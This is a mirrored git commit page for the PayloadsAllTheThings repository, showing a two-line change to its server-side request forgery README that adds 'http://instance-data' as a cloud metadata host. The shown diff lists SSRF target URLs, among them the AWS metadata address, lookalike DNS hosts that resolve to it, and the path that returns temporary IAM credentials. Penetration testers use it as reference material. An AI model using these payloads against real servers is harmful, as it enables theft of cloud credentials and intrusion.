ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2025-01-18 09:25:26 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

Merge pull request #164 from Techbrunch/patch-3

Browse Source 
Update AWS SSRF tips
This commit is contained in:
Swissky 2020-03-11 16:33:27 +01:00 committed by GitHub
commit 70182d32c9
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 2 additions and 1 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
Server Side Request Forgery/README.md
View File

@ -394,7 +394,7 @@ https://website.mil/plugins/servlet/oauth/users/icon-uri?consumerUri=http://brut
### SSRF URL for AWS Bucket
[Docs](http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories)
Interesting path to look for at `http://169.254.169.254`
Interesting path to look for at `http://169.254.169.254` or `http://instance-data`
```powershell
Always here : /latest/meta-data/{hostname,public-ipv4,...}
@ -405,6 +405,7 @@ Temporary AWS credentials : /latest/meta-data/iam/security-credentials/
DNS record
```powershell
http://instance-data
http://169.254.169.254
http://metadata.nicob.net/
http://169.254.169.254.xip.io/